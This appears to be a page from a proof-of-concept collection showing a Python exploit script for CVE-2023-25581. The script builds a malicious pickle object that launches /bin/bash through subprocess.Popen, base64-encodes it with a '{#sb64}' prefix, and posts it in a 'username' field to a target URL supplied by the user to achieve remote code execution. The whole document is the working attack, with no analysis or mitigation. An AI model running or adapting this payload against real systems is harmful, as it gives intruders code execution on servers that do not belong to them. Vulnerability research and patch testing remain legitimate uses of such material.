4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / Poc-CVE-2023-25581.py PY
import base64
import pickle
import requests


class ExploitPayload:
    def __reduce__(self):
        import subprocess
        return (subprocess.Popen, (['/bin/bash'],))


def create_exploit_payload():
    serialized_payload = pickle.dumps(ExploitPayload())
    base64_payload = base64.b64encode(serialized_payload).decode('utf-8')
    return "{#sb64}" + base64_payload


def send_exploit_payload(payload, target_url):
    data = {
        "username": payload,
        "email": "[email protected]"
    }
    return requests.post(target_url, json=data)


if __name__ == "__main__":
    target_url = input("Enter the target URL (e.g., http://vulnerable-app.com/api/profile): ")

    payload = create_exploit_payload()
    print(f"Generated exploit payload: {payload}")

    response = send_exploit_payload(payload, target_url)

    if response.status_code == 200:
        print("Payload sent successfully! Check your terminal for RCE.")
    else:
        print(f"Failed to send payload, response code: {response.status_code}")